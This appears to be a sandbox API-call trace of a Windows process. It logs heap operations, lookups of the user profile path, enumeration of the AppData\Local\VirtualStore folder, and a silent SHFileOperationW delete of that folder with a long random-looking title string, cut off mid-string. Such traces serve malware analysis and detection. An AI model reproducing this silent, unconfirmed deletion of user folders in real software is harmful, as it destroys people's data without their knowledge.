[0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.497] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0251.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0251.498] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.498] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0251.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24f5278 [0251.500] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/VirtualStore", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore", lpFilePart=0x8bedfc*="VirtualStore") returned 0x38 [0251.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0251.500] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\virtualstore")) returned 0x2010 [0251.500] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x120d, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5660 [0251.500] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x120d, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0251.501] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x120d, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 0 [0251.501] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0251.501] GetLastError () returned 0x12 [0251.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.501] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0251.502] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0251.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.502] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0251.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0251.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0251.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24f5278 [0251.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/VirtualStore", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore", lpFilePart=0x8bf658*="VirtualStore") returned 0x38 [0251.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0251.505] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\virtualstore")) returned 0x2010 [0251.505] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\